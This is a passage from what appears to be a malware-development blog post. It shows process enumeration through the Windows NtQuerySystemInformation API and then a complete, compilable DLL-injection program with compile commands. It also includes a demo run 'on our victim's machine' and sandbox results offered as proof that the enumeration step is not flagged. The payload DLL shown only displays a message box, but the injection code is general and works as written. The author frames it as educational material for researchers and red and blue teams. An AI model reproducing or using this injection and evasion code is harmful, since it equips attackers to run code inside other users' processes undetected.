); HeapFree ( GetProcessHeap (), 0 , szTargetProc ); return pid ; } int main ( int argc , char * argv []) { int pid = 0 ; // process ID pid = findMyProc ( argv [ 1 ]); printf ( "%s%d \n " , pid > 0 ? "process found at pid = " : "process not found. pid = " , pid ); return 0 ; } demo Let’s compile it using MinGW: x86_64-w64-mingw32-gcc hack.c -o hack.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -static-libgcc Now, let’s test it. I’ll open mspaint.exe and try to find its PID: . \hack.exe mspaint.exe As you can see everything is worked as expected! =^..^= Let’s analyze with ANY.RUN : As you can see, ANY.RUN says that everything is ok: no threats detected . So our logic using this NT function for process enum not looks as malicious or suspicious action. https://app.any.run/tasks/b6caa188-9899-4181-affe-5c4e25f4ca82 practical example 2. DLL injection Of course we can use it for some “bad” actions. Let’s say we have “malicious” DLL: /* * evil.c * simple DLL for DLL inject to process * author: @cocomelonc */ #include BOOL APIENTRY DllMain ( HMODULE hModule , DWORD nReason , LPVOID lpReserved ) { switch ( nReason ) { case DLL_PROCESS_ATTACH : MessageBox ( NULL , "Meow from evil.dll!" , "=^..^=" , MB_OK ); break ; case DLL_PROCESS_DETACH : break ; case DLL_THREAD_ATTACH : break ; case DLL_THREAD_DETACH : break ; } return TRUE ; } Let’s inject it via finding victim’s id by NtQuerySystemInformation ( hack2.c ): /* * hack2.c * process enum via NtQuerySystemInformation * DLL injection example * author: @cocomelonc * https://cocomelonc.github.io/malware/2025/12/26/malware-trick-55.html */ #include #include #include #include char evilDLL [] = "Z: \\ evil.dll" ; unsigned int evilLen = sizeof ( evilDLL ) + 1 ; typedef struct _UNICODE_STRING { USHORT Length ; USHORT MaximumLength ; PWSTR Buffer ; } UNICODE_STRING , * PUNICODE_STRING ; // https://github.com/winsiderss/systeminformer/blob/master/phnt/include/ntexapi.h#L1324 typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation , // q: SYSTEM_BASIC_INFORMATION SystemProcessorInformation , // q: SYSTEM_PROCESSOR_INFORMATION SystemPerformanceInformation , // q: SYSTEM_PERFORMANCE_INFORMATION SystemTimeOfDayInformation , // q: SYSTEM_TIMEOFDAY_INFORMATION SystemPathInformation , // not implemented SystemProcessInformation , // q: SYSTEM_PROCESS_INFORMATION SystemCallCountInformation , // q: SYSTEM_CALL_COUNT_INFORMATION SystemDeviceInformation , // q: SYSTEM_DEVICE_INFORMATION SystemProcessorPerformanceInformation , // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION (EX in: USHORT ProcessorGroup) SystemFlagsInformation , // q: SYSTEM_FLAGS_INFORMATION SystemCallTimeInformation , // not implemented // SYSTEM_CALL_TIME_INFORMATION // 10 SystemModuleInformation , // q: RTL_PROCESS_MODULES SystemLocksInformation , // q: RTL_PROCESS_LOCKS SystemStackTraceInformation , // q: RTL_PROCESS_BACKTRACES SystemPagedPoolInformation , // not implemented SystemNonPagedPoolInformation , // not implemented SystemHandleInformation , // q: SYSTEM_HANDLE_INFORMATION SystemObjectInformation , // q: SYSTEM_OBJECTTYPE_INFORMATION mixed with SYSTEM_OBJECT_INFORMATION SystemPageFileInformation , // q: SYSTEM_PAGEFILE_INFORMATION SystemVdmInstemulInformation , // q: SYSTEM_VDM_INSTEMUL_INFO SystemVdmBopInformation , // not implemented // 20 SystemFileCacheInformation , // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemCache) SystemPoolTagInformation , // q: SYSTEM_POOLTAG_INFORMATION SystemInterruptInformation , // q: SYSTEM_INTERRUPT_INFORMATION (EX in: USHORT ProcessorGroup) SystemDpcBehaviorInformation , // q: SYSTEM_DPC_BEHAVIOR_INFORMATION; s: SYSTEM_DPC_BEHAVIOR_INFORMATION (requires SeLoadDriverPrivilege) SystemFullMemoryInformation , // not implemented // SYSTEM_MEMORY_USAGE_INFORMATION SystemLoadGdiDriverInformation , // s (kernel-mode only) SystemUnloadGdiDriverInformation , // s (kernel-mode only) SystemTimeAdjustmentInformation , // q: SYSTEM_QUERY_TIME_ADJUST_INFORMATION; s: SYSTEM_SET_TIME_ADJUST_INFORMATION (requires SeSystemtimePrivilege) SystemSummaryMemoryInformation , // not implemented // SYSTEM_MEMORY_USAGE_INFORMATION SystemMirrorMemoryInformation , // s (requires license value "Kernel-MemoryMirroringSupported") (requires SeShutdownPrivilege) // 30 SystemPerformanceTraceInformation , // q; s: (type depends on EVENT_TRACE_INFORMATION_CLASS) SystemObsolete0 , // not implemented SystemExceptionInformation , // q: SYSTEM_EXCEPTION_INFORMATION SystemCrashDumpStateInformation , // s: SYSTEM_CRASH_DUMP_STATE_INFORMATION (requires SeDebugPrivilege) SystemKernelDebuggerInformation , // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION SystemContextSwitchInformation , // q: SYSTEM_CONTEXT_SWITCH_INFORMATION SystemRegistryQuotaInformation , // q: SYSTEM_REGISTRY_QUOTA_INFORMATION; s (requires SeIncreaseQuotaPrivilege) SystemExtendServiceTableInformation , // s (requires SeLoadDriverPrivilege) // loads win32k only SystemPrioritySeperation , // s (requires SeTcbPrivilege) SystemVerifierAddDriverInformation , // s (requires SeDebugPrivilege) // 40 SystemVerifierRemoveDriverInformation , // s (requires SeDebugPrivilege) SystemProcessorIdleInformation , // q: SYSTEM_PROCESSOR_IDLE_INFORMATION (EX in: USHORT ProcessorGroup) SystemLegacyDriverInformation , // q: SYSTEM_LEGACY_DRIVER_INFORMATION SystemCurrentTimeZoneInformation , // q; s: RTL_TIME_ZONE_INFORMATION SystemLookasideInformation , // q: SYSTEM_LOOKASIDE_INFORMATION SystemTimeSlipNotification , // s: HANDLE (NtCreateEvent) (requires SeSystemtimePrivilege) SystemSessionCreate , // not implemented SystemSessionDetach , // not implemented SystemSessionInformation , // not implemented (SYSTEM_SESSION_INFORMATION) SystemRangeStartInformation , // q: SYSTEM_RANGE_START_INFORMATION // 50 SystemVerifierInformation , // q: SYSTEM_VERIFIER_INFORMATION; s (requires SeDebugPrivilege) SystemVerifierThunkExtend , // s (kernel-mode only) SystemSessionProcessInformation , // q: SYSTEM_SESSION_PROCESS_INFORMATION SystemLoadGdiDriverInSystemSpace , // s: SYSTEM_GDI_DRIVER_INFORMATION (kernel-mode only) (same as SystemLoadGdiDriverInformation) SystemNumaProcessorMap , // q: SYSTEM_NUMA_INFORMATION SystemPrefetcherInformation , // q; s: PREFETCHER_INFORMATION // PfSnQueryPrefetcherInformation SystemExtendedProcessInformation , // q: SYSTEM_PROCESS_INFORMATION SystemRecommendedSharedDataAlignment , // q: ULONG // KeGetRecommendedSharedDataAlignment SystemComPlusPackage , // q; s: ULONG SystemNumaAvailableMemory , // q: SYSTEM_NUMA_INFORMATION // 60 SystemProcessorPowerInformation , // q: SYSTEM_PROCESSOR_POWER_INFORMATION (EX in: USHORT ProcessorGroup) SystemEmulationBasicInformation , // q: SYSTEM_BASIC_INFORMATION SystemEmulationProcessorInformation , // q: SYSTEM_PROCESSOR_INFORMATION SystemExtendedHandleInformation , // q: SYSTEM_HANDLE_INFORMATION_EX SystemLostDelayedWriteInformation , // q: ULONG SystemBigPoolInformation , // q: SYSTEM_BIGPOOL_INFORMATION SystemSessionPoolTagInformation , // q: SYSTEM_SESSION_POOLTAG_INFORMATION SystemSessionMappedViewInformation , // q: SYSTEM_SESSION_MAPPED_VIEW_INFORMATION SystemHotpatchInformation , // q; s: SYSTEM_HOTPATCH_CODE_INFORMATION SystemObjectSecurityMode , // q: ULONG // 70 SystemWatchdogTimerHandler , // s: SYSTEM_WATCHDOG_HANDLER_INFORMATION // (kernel-mode only) SystemWatchdogTimerInformation , // q: SYSTEM_WATCHDOG_TIMER_INFORMATION // (kernel-mode only) SystemLogicalProcessorInformation , // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION (EX in: USHORT ProcessorGroup) SystemWow64SharedInformationObsolete , // not implemented SystemRegisterFirmwareTableInformationHandler , // s: SYSTEM_FIRMWARE_TABLE_HANDLER // (kernel-mode only) SystemFirmwareTableInformation , // SYSTEM_FIRMWARE_TABLE_INFORMATION SystemModuleInformationEx , // q: RTL_PROCESS_MODULE_INFORMATION_EX SystemVerifierTriageInformation , // not implemented SystemSuperfetchInformation , // q; s: SUPERFETCH_INFORMATION // PfQuerySuperfetchInformation SystemMemoryListInformation , // q: SYSTEM_MEMORY_LIST_INFORMATION; s: SYSTEM_MEMORY_LIST_COMMAND (requires SeProfileSingleProcessPrivilege) // 80 SystemFileCacheInformationEx , // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (same as SystemFileCacheInformation) SystemThreadPriorityClientIdInformation , // s: SYSTEM_THREAD_CID_PRIORITY_INFORMATION (requires SeIncreaseBasePriorityPrivilege) SystemProcessorIdleCycleTimeInformation , // q: SYSTEM_PROCESSOR_IDLE_CYCLE_TIME_INFORMATION[] (EX in: USHORT ProcessorGroup) SystemVerifierCancellationInformation , // SYSTEM_VERIFIER_CANCELLATION_INFORMATION // name:wow64:whNT32QuerySystemVerifierCancellationInformation SystemProcessorPowerInformationEx , // not implemented SystemRefTraceInformation , // q; s: SYSTEM_REF_TRACE_INFORMATION // ObQueryRefTraceInformation SystemSpecialPoolInformation , // q; s: SYSTEM_SPECIAL_POOL_INFORMATION (requires SeDebugPrivilege) // MmSpecialPoolTag, then MmSpecialPoolCatchOverruns != 0 SystemProcessIdInformation , // q: SYSTEM_PROCESS_ID_INFORMATION SystemErrorPortInformation , // s (requires SeTcbPrivilege) SystemBootEnvironmentInformation , // q: SYSTEM_BOOT_ENVIRONMENT_INFORMATION // 90 SystemHypervisorInformation , // q: SYSTEM_HYPERVISOR_QUERY_INFORMATION SystemVerifierInformationEx , // q; s: SYSTEM_VERIFIER_INFORMATION_EX SystemTimeZoneInformation , // q; s: RTL_TIME_ZONE_INFORMATION (requires SeTimeZonePrivilege) SystemImageFileExecutionOptionsInformation , // s: SYSTEM_IMAGE_FILE_EXECUTION_OPTIONS_INFORMATION (requires SeTcbPrivilege) SystemCoverageInformation , // q: COVERAGE_MODULES s: COVERAGE_MODULE_REQUEST // ExpCovQueryInformation (requires SeDebugPrivilege) SystemPrefetchPatchInformation , // SYSTEM_PREFETCH_PATCH_INFORMATION SystemVerifierFaultsInformation , // s: SYSTEM_VERIFIER_FAULTS_INFORMATION (requires SeDebugPrivilege) SystemSystemPartitionInformation , // q: SYSTEM_SYSTEM_PARTITION_INFORMATION SystemSystemDiskInformation , // q: SYSTEM_SYSTEM_DISK_INFORMATION SystemProcessorPerformanceDistribution , // q: SYSTEM_PROCESSOR_PERFORMANCE_DISTRIBUTION (EX in: USHORT ProcessorGroup) // 100 SystemNumaProximityNodeInformation , // q; s: SYSTEM_NUMA_PROXIMITY_MAP SystemDynamicTimeZoneInformation , // q; s: RTL_DYNAMIC_TIME_ZONE_INFORMATION (requires SeTimeZonePrivilege) SystemCodeIntegrityInformation , // q: SYSTEM_CODEINTEGRITY_INFORMATION // SeCodeIntegrityQueryInformation SystemProcessorMicrocodeUpdateInformation , // s: SYSTEM_PROCESSOR_MICROCODE_UPDATE_INFORMATION SystemProcessorBrandString , // q: CHAR[] // HaliQuerySystemInformation -> HalpGetProcessorBrandString, info class 23 SystemVirtualAddressInformation , // q: SYSTEM_VA_LIST_INFORMATION[]; s: SYSTEM_VA_LIST_INFORMATION[] (requires SeIncreaseQuotaPrivilege) // MmQuerySystemVaInformation SystemLogicalProcessorAndGroupInformation , // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX (EX in: LOGICAL_PROCESSOR_RELATIONSHIP RelationshipType) // since WIN7 // KeQueryLogicalProcessorRelationship SystemProcessorCycleTimeInformation , // q: SYSTEM_PROCESSOR_CYCLE_TIME_INFORMATION[] (EX in: USHORT ProcessorGroup) SystemStoreInformation , // q; s: SYSTEM_STORE_INFORMATION (requires SeProfileSingleProcessPrivilege) // SmQueryStoreInformation SystemRegistryAppendString , // s: SYSTEM_REGISTRY_APPEND_STRING_PARAMETERS // 110 SystemAitSamplingValue , // s: ULONG (requires SeProfileSingleProcessPrivilege) SystemVhdBootInformation , // q: SYSTEM_VHD_BOOT_INFORMATION SystemCpuQuotaInformation , // q; s: PS_CPU_QUOTA_QUERY_INFORMATION SystemNativeBasicInformation , // q: SYSTEM_BASIC_INFORMATION SystemErrorPortTimeouts , // SYSTEM_ERROR_PORT_TIMEOUTS SystemLowPriorityIoInformation , // q: SYSTEM_LOW_PRIORITY_IO_INFORMATION SystemTpmBootEntropyInformation , // q: TPM_BOOT_ENTROPY_NT_RESULT // ExQueryTpmBootEntropyInformation SystemVerifierCountersInformation , // q: SYSTEM_VERIFIER_COUNTERS_INFORMATION SystemPagedPoolInformationEx , // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypePagedPool) SystemSystemPtesInformationEx , // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemPtes) // 120 SystemNodeDistanceInformation , // q: USHORT[4*NumaNodes] // (EX in: USHORT NodeNumber) SystemAcpiAuditInformation , // q: SYSTEM_ACPI_AUDIT_INFORMATION // HaliQuerySystemInformation -> HalpAuditQueryResults, info class 26 SystemBasicPerformanceInformation , // q: SYSTEM_BASIC_PERFORMANCE_INFORMATION // name:wow64:whNtQuerySystemInformation_SystemBasicPerformanceInformation SystemQueryPerformanceCounterInformation , // q: SYSTEM_QUERY_PERFORMANCE_COUNTER_INFORMATION // since WIN7 SP1 SystemSessionBigPoolInformation , // q: SYSTEM_SESSION_POOLTAG_INFORMATION // since WIN8 SystemBootGraphicsInformation , // q; s: SYSTEM_BOOT_GRAPHICS_INFORMATION (kernel-mode only) SystemScrubPhysicalMemoryInformation , // q; s: MEMORY_SCRUB_INFORMATION SystemBadPageInformation , SystemProcessorProfileControlArea , // q; s: SYSTEM_PROCESSOR_PROFILE_CONTROL_AREA SystemCombinePhysicalMemoryInformation , // s: MEMORY_COMBINE_INFORMATION, MEMORY_COMBINE_INFORMATION_EX, MEMORY_COMBINE_INFORMATION_EX2 // 130 SystemEntropyInterruptTimingInformation , // q; s: SYSTEM_ENTROPY_TIMING_INFORMATION SystemConsoleInformation , // q; s: SYSTEM_CONSOLE_INFORMATION SystemPlatformBinaryInformation , // q: SYSTEM_PLATFORM_BINARY_INFORMATION (requires SeTcbPrivilege) SystemPolicyInformation , // q: SYSTEM_POLICY_INFORMATION (Warbird/Encrypt/Decrypt/Execute) SystemHypervisorProcessorCountInformation , // q: SYSTEM_HYPERVISOR_PROCESSOR_COUNT_INFORMATION SystemDeviceDataInformation , // q: SYSTEM_DEVICE_DATA_INFORMATION SystemDeviceDataEnumerationInformation , // q: SYSTEM_DEVICE_DATA_INFORMATION SystemMemoryTopologyInformation , // q: SYSTEM_MEMORY_TOPOLOGY_INFORMATION SystemMemoryChannelInformation , // q: SYSTEM_MEMORY_CHANNEL_INFORMATION SystemBootLogoInformation , // q: SYSTEM_BOOT_LOGO_INFORMATION // 140 SystemProcessorPerformanceInformationEx , // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION_EX // (EX in: USHORT ProcessorGroup) // since WINBLUE SystemCriticalProcessErrorLogInformation , SystemSecureBootPolicyInformation , // q: SYSTEM_SECUREBOOT_POLICY_INFORMATION SystemPageFileInformationEx , // q: SYSTEM_PAGEFILE_INFORMATION_EX SystemSecureBootInformation , // q: SYSTEM_SECUREBOOT_INFORMATION SystemEntropyInterruptTimingRawInformation , SystemPortableWorkspaceEfiLauncherInformation , // q: SYSTEM_PORTABLE_WORKSPACE_EFI_LAUNCHER_INFORMATION SystemFullProcessInformation , // q: SYSTEM_PROCESS_INFORMATION with SYSTEM_PROCESS_INFORMATION_EXTENSION (requires admin) SystemKernelDebuggerInformationEx , // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX SystemBootMetadataInformation , // 150 SystemSoftRebootInformation , // q: ULONG SystemElamCertificateInformation , // s: SYSTEM_ELAM_CERTIFICATE_INFORMATION SystemOfflineDumpConfigInformation , // q: OFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V2 SystemProcessorFeaturesInformation , // q: SYSTEM_PROCESSOR_FEATURES_INFORMATION SystemRegistryReconciliationInformation , // s: NULL (requires admin) (flushes registry hives) SystemEdidInformation , // q: SYSTEM_EDID_INFORMATION SystemManufacturingInformation , // q: SYSTEM_MANUFACTURING_INFORMATION // since THRESHOLD SystemEnergyEstimationConfigInformation , // q: SYSTEM_ENERGY_ESTIMATION_CONFIG_INFORMATION SystemHypervisorDetailInformation , // q: SYSTEM_HYPERVISOR_DETAIL_INFORMATION SystemProcessorCycleStatsInformation , // q: SYSTEM_PROCESSOR_CYCLE_STATS_INFORMATION (EX in: USHORT ProcessorGroup) // 160 SystemVmGenerationCountInformation , SystemTrustedPlatformModuleInformation , // q: SYSTEM_TPM_INFORMATION SystemKernelDebuggerFlags , // SYSTEM_KERNEL_DEBUGGER_FLAGS SystemCodeIntegrityPolicyInformation , // q; s: SYSTEM_CODEINTEGRITYPOLICY_INFORMATION SystemIsolatedUserModeInformation , // q: SYSTEM_ISOLATED_USER_MODE_INFORMATION SystemHardwareSecurityTestInterfaceResultsInformation , SystemSingleModuleInformation , // q: SYSTEM_SINGLE_MODULE_INFORMATION SystemAllowedCpuSetsInformation , SystemVsmProtectionInformation , // q: SYSTEM_VSM_PROTECTION_INFORMATION (previously SystemDmaProtectionInformation) SystemInterruptCpuSetsInformation , // q: SYSTEM_INTERRUPT_CPU_SET_INFORMATION // 170 SystemSecureBootPolicyFullInformation , // q: SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION SystemCodeIntegrityPolicyFullInformation , SystemAffinitizedInterruptProcessorInformation , // (requires SeIncreaseBasePriorityPrivilege) SystemRootSiloInformation , // q: SYSTEM_ROOT_SILO_INFORMATION SystemCpuSetInformation , // q: SYSTEM_CPU_SET_INFORMATION // since THRESHOLD2 SystemCpuSetTagInformation , // q: SYSTEM_CPU_SET_TAG_INFORMATION SystemWin32WerStartCallout , SystemSecureKernelProfileInformation , // q: SYSTEM_SECURE_KERNEL_HYPERGUARD_PROFILE_INFORMATION SystemCodeIntegrityPlatformManifestInformation , // q: SYSTEM_SECUREBOOT_PLATFORM_MANIFEST_INFORMATION // since REDSTONE SystemInterruptSteeringInformation , // SYSTEM_INTERRUPT_STEERING_INFORMATION_INPUT // 180 SystemSupportedProcessorArchitectures , // p: in opt: HANDLE, out: SYSTEM_SUPPORTED_PROCESSOR_ARCHITECTURES_INFORMATION[] // NtQuerySystemInformationEx SystemMemoryUsageInformation , // q: SYSTEM_MEMORY_USAGE_INFORMATION SystemCodeIntegrityCertificateInformation , // q: SYSTEM_CODEINTEGRITY_CERTIFICATE_INFORMATION SystemPhysicalMemoryInformation , // q: SYSTEM_PHYSICAL_MEMORY_INFORMATION // since REDSTONE2 SystemControlFlowTransition , // (Warbird/Encrypt/Decrypt/Execute) SystemKernelDebuggingAllowed , // s: ULONG SystemActivityModerationExeState , // SYSTEM_ACTIVITY_MODERATION_EXE_STATE SystemActivityModerationUserSettings , // SYSTEM_ACTIVITY_MODERATION_USER_SETTINGS SystemCodeIntegrityPoliciesFullInformation , SystemCodeIntegrityUnlockInformation , // SYSTEM_CODEINTEGRITY_UNLOCK_INFORMATION // 190 SystemIntegrityQuotaInformation , SystemFlushInformation , // q: SYSTEM_FLUSH_INFORMATION SystemProcessorIdleMaskInformation , // q: ULONG_PTR[ActiveGroupCount] // since REDSTONE3 SystemSecureDumpEncryptionInformation , SystemWriteConstraintInformation , // SYSTEM_WRITE_CONSTRAINT_INFORMATION SystemKernelVaShadowInformation , // SYSTEM_KERNEL_VA_SHADOW_INFORMATION SystemHypervisorSharedPageInformation , // SYSTEM_HYPERVISOR_SHARED_PAGE_INFORMATION // since REDSTONE4 SystemFirmwareBootPerformanceInformation , SystemCodeIntegrityVerificationInformation , // SYSTEM_CODEINTEGRITYVERIFICATION_INFORMATION SystemFirmwarePartitionInformation , // SYSTEM_FIRMWARE_PARTITION_INFORMATION // 200 SystemSpeculationControlInformation , // SYSTEM_SPECULATION_CONTROL_INFORMATION // (CVE-2017-5715) REDSTONE3 and above. SystemDmaGuardPolicyInformation , // SYSTEM_DMA_GUARD_POLICY_INFORMATION SystemEnclaveLaunchControlInformation , // SYSTEM_ENCLAVE_LAUNCH_CONTROL_INFORMATION SystemWorkloadAllowedCpuSetsInformation , // SYSTEM_WORKLOAD_ALLOWED_CPU_SET_INFORMATION // since REDSTONE5 SystemCodeIntegrityUnlockModeInformation , SystemLeapSecondInformation , // SYSTEM_LEAP_SECOND_INFORMATION SystemFlags2Information , // q: SYSTEM_FLAGS_INFORMATION SystemSecurityModelInformation , // SYSTEM_SECURITY_MODEL_INFORMATION // since 19H1 SystemCodeIntegritySyntheticCacheInformation , SystemFeatureConfigurationInformation , // SYSTEM_FEATURE_CONFIGURATION_INFORMATION // since 20H1 // 210 SystemFeatureConfigurationSectionInformation , // SYSTEM_FEATURE_CONFIGURATION_SECTIONS_INFORMATION SystemFeatureUsageSubscriptionInformation , // SYSTEM_FEATURE_USAGE_SUBSCRIPTION_DETAILS SystemSecureSpeculationControlInformation , // SECURE_SPECULATION_CONTROL_INFORMATION SystemSpacesBootInformation , // since 20H2 SystemFwRamdiskInformation , // SYSTEM_FIRMWARE_RAMDISK_INFORMATION SystemWheaIpmiHardwareInformation , SystemDifSetRuleClassInformation , SystemDifClearRuleClassInformation , SystemDifApplyPluginVerificationOnDriver , SystemDifRemovePluginVerificationOnDriver , // 220 SystemShadowStackInformation , // SYSTEM_SHADOW_STACK_INFORMATION SystemBuildVersionInformation , // SYSTEM_BUILD_VERSION_INFORMATION SystemPoolLimitInformation , // SYSTEM_POOL_LIMIT_INFORMATION (requires SeIncreaseQuotaPrivilege) SystemCodeIntegrityAddDynamicStore , SystemCodeIntegrityClearDynamicStores , SystemDifPoolTrackingInformation , SystemPoolZeroingInformation , // SYSTEM_POOL_ZEROING_INFORMATION SystemDpcWatchdogInformation , SystemDpcWatchdogInformation2 , SystemSupportedProcessorArchitectures2 , // q: in opt: HANDLE, out: SYSTEM_SUPPORTED_PROCESSOR_ARCHITECTURES_INFORMATION[] // NtQuerySystemInformationEx // 230 SystemSingleProcessorRelationshipInformation , // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX // (EX in: PROCESSOR_NUMBER Processor) SystemXfgCheckFailureInformation , SystemIommuStateInformation , // SYSTEM_IOMMU_STATE_INFORMATION // since 22H1 SystemHypervisorMinrootInformation , // SYSTEM_HYPERVISOR_MINROOT_INFORMATION SystemHypervisorBootPagesInformation , // SYSTEM_HYPERVISOR_BOOT_PAGES_INFORMATION SystemPointerAuthInformation , // SYSTEM_POINTER_AUTH_INFORMATION SystemSecureKernelDebuggerInformation , SystemOriginalImageFeatureInformation , MaxSystemInfoClass } SYSTEM_INFORMATION_CLASS ; // https://processhacker.sourceforge.io/doc/ntbasic_8h.html typedef LONG KPRIORITY ; // https://doxygen.reactos.org/da/df4/struct__SYSTEM__PROCESS__INFORMATION.html typedef struct _SYSTEM_PROCESS_INFORMATION { ULONG NextEntryOffset ; ULONG NumberOfThreads ; LARGE_INTEGER WorkingSetPrivateSize ; //VISTA ULONG HardFaultCount ; //WIN7 ULONG NumberOfThreadsHighWatermark ; //WIN7 ULONGLONG CycleTime ; //WIN7 LARGE_INTEGER CreateTime ; LARGE_INTEGER UserTime ; LARGE_INTEGER KernelTime ; UNICODE_STRING ImageName ; KPRIORITY BasePriority ; HANDLE UniqueProcessId ; HANDLE InheritedFromUniqueProcessId ; ULONG HandleCount ; ULONG SessionId ; ULONG_PTR PageDirectoryBase ; SIZE_T PeakVirtualSize ; SIZE_T VirtualSize ; ULONG PageFaultCount ; SIZE_T PeakWorkingSetSize ; SIZE_T WorkingSetSize ; SIZE_T QuotaPeakPagedPoolUsage ; SIZE_T QuotaPagedPoolUsage ; SIZE_T QuotaPeakNonPagedPoolUsage ; SIZE_T QuotaNonPagedPoolUsage ; SIZE_T PagefileUsage ; SIZE_T PeakPagefileUsage ; SIZE_T PrivatePageCount ; LARGE_INTEGER ReadOperationCount ; LARGE_INTEGER WriteOperationCount ; LARGE_INTEGER OtherOperationCount ; LARGE_INTEGER ReadTransferCount ; LARGE_INTEGER WriteTransferCount ; LARGE_INTEGER OtherTransferCount ; // SYSTEM_THREAD_INFORMATION TH[1]; } SYSTEM_PROCESS_INFORMATION , * PSYSTEM_PROCESS_INFORMATION ; // typedef NtQuerySystemInformation typedef NTSTATUS ( NTAPI * fnNtQuerySystemInformation )( SYSTEM_INFORMATION_CLASS SystemInformationClass , PVOID SystemInformation , ULONG SystemInformationLength , PULONG ReturnLength ); int findMyProc ( const char * procName ) { fnNtQuerySystemInformation pNtQuerySystemInformation = NULL ; ULONG uReturnLen = 0 ; PSYSTEM_PROCESS_INFORMATION SystemProcInfo = NULL ; PVOID pValueToFree = NULL ; NTSTATUS STATUS = 0 ; int pid = 0 ; // get function address from ntdll pNtQuerySystemInformation = ( fnNtQuerySystemInformation ) GetProcAddress ( GetModuleHandle ( "ntdll.dll" ), "NtQuerySystemInformation" ); if ( pNtQuerySystemInformation == NULL ) return 0 ; // convert ANSI to WideChar (LPCWSTR) for comparsion int nLen = MultiByteToWideChar ( CP_ACP , 0 , procName , - 1 , NULL , 0 ); WCHAR * szTargetProc = ( WCHAR * ) HeapAlloc ( GetProcessHeap (), HEAP_ZERO_MEMORY , nLen * sizeof ( WCHAR )); if ( szTargetProc == NULL ) return 0 ; MultiByteToWideChar ( CP_ACP , 0 , procName , - 1 , szTargetProc , nLen ); // get buffer size pNtQuerySystemInformation (( SYSTEM_INFORMATION_CLASS ) 5 , NULL , 0 , & uReturnLen ); // allocate memory SystemProcInfo = ( PSYSTEM_PROCESS_INFORMATION ) HeapAlloc ( GetProcessHeap (), HEAP_ZERO_MEMORY , ( SIZE_T ) uReturnLen ); if ( SystemProcInfo == NULL ) { HeapFree ( GetProcessHeap (), 0 , szTargetProc ); return 0 ; } pValueToFree = SystemProcInfo ; // get information about processes STATUS = pNtQuerySystemInformation (( SYSTEM_INFORMATION_CLASS ) 5 , SystemProcInfo , uReturnLen , & uReturnLen ); if ( STATUS != 0 ) { HeapFree ( GetProcessHeap (), 0 , pValueToFree ); HeapFree ( GetProcessHeap (), 0 , szTargetProc ); return 0 ; } // enum while ( TRUE ) { if ( SystemProcInfo -> ImageName . Length && SystemProcInfo -> ImageName . Buffer ) { if ( wcscmp ( SystemProcInfo -> ImageName . Buffer , szTargetProc ) == 0 ) { pid = ( int )( ULONG_PTR ) SystemProcInfo -> UniqueProcessId ; break ; } } if ( ! SystemProcInfo -> NextEntryOffset ) break ; SystemProcInfo = ( PSYSTEM_PROCESS_INFORMATION )(( ULONG_PTR ) SystemProcInfo + SystemProcInfo -> NextEntryOffset ); } // cleanup HeapFree ( GetProcessHeap (), 0 , pValueToFree ); HeapFree ( GetProcessHeap (), 0 , szTargetProc ); return pid ; } int main ( int argc , char * argv []) { int pid = 0 ; // process ID HANDLE ph ; // process handle HANDLE rt ; // remote thread LPVOID rb ; // remote buffer // handle to kernel32 and pass it to GetProcAddress HMODULE hKernel32 = GetModuleHandle ( "Kernel32" ); VOID * lb = GetProcAddress ( hKernel32 , "LoadLibraryA" ); // get process ID by name pid = findMyProc ( argv [ 1 ]); printf ( "%s%d \n " , pid > 0 ? "process found at pid = " : "process not found. pid = " , pid ); if ( pid == 0 ) { return - 1 ; } // open process ph = OpenProcess ( PROCESS_ALL_ACCESS , FALSE , DWORD ( pid )); if ( ph == NULL ) { printf ( "OpenProcess failed! exiting... \n " ); return - 1 ; } // allocate memory buffer for remote process rb = VirtualAllocEx ( ph , NULL , evilLen , ( MEM_RESERVE | MEM_COMMIT ), PAGE_EXECUTE_READWRITE ); // "copy" evil DLL between processes WriteProcessMemory ( ph , rb , evilDLL , evilLen , NULL ); // our process start new thread rt = CreateRemoteThread ( ph , NULL , 0 , ( LPTHREAD_START_ROUTINE ) lb , rb , 0 , NULL ); CloseHandle ( ph ); return 0 ; } As you can see, logic is pretty simple, find PID via NtQuerySystemInformation and inject our meow DLL. demo 2 Compile DLL: x86_64-w64-mingw32-gcc -shared -o evil.dll evil.c Compile our malware: x86_64-w64-mingw32-gcc hack.c -o hack.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -static-libgcc Then run on our victim’s machine: . \hack2.exe mspaint.exe As you can see, everything is worked perfectly again, as expected! =^..^= Let’s analyze with ANY.RUN : As you can see, ANY.RUN says that: Suspicious activity . https://app.any.run/tasks/cf60b6ba-817e-4f86-b887-693be8419a4f But this is related to the injection logic and not to our NT function Thanks to ANY.RUN for API! final words Using NtQuerySystemInformation is a another classic technique in malware development to stay away from the more obvious Win32 APIs. While not a “silver bullet” against modern EDRs (which monitor NTAPI calls as well), it provides a better understanding of how Windows manages process data internally. As far as I know this function used by Process Hacker , for performance in process enumeration. The MHook library also got a significant performance boost when switching from CreateToolhelp32Snapshot() to NtQuerySystemInformation() Another caveat, by intercepting calls to the NtQuerySystemInformation function, we also can hide a some specified process, from common process monitoring tools such as Task Manager and Process Hacker. This is also an interesting trick in malware development, but I will write about this in a separate post. I hope this post is useful for malware researchers, C/C++ programmers, spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red teamers arsenal. NtQuerySystemInformation Mhook Enhancements: 10x Speed Improvement and Other Fixes ANY.RUN ANY.RUN: hack.exe ANY.RUN: hack2.exe source code in Github This is a practical case for educational purposes only. Thanks for your time happy hacking and good bye! PS. All drawings and screenshots are mine Share on Twitter Facebook LinkedIn You may also enjoy MacOS malware persistence 9: emond (The Event Monitor Daemon). Simple C example 